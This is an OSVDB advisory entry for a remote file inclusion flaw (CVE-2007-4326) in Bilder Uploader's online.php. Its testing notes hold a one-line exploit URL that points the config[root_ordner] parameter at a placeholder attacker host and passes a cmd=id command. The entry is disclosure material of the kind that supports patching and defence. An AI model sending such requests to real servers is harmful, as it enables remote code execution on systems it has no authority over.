Bilder Uploader online.php config[root_ordner] Variable Remote File Inclusion

2007-08-09T00:00:00
ID OSVDB:36447
Type osvdb
Reporter Rizgar(rizgar@linuxmail.org)
Modified 2007-08-09T00:00:00

Description

Manual Testing Notes

http://[target]/path/online.php?config[root_ordner]=http://[attacker]?&cmd=id

References:

Secunia Advisory ID: 26399
Related OSVDB ID: 36446
Related OSVDB ID: 36444
Related OSVDB ID: 36443
Related OSVDB ID: 36445
Related OSVDB ID: 36448
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-08/0113.html
ISS X-Force ID: 35922
FrSIRT Advisory: ADV-2007-2836
CVE-2007-4326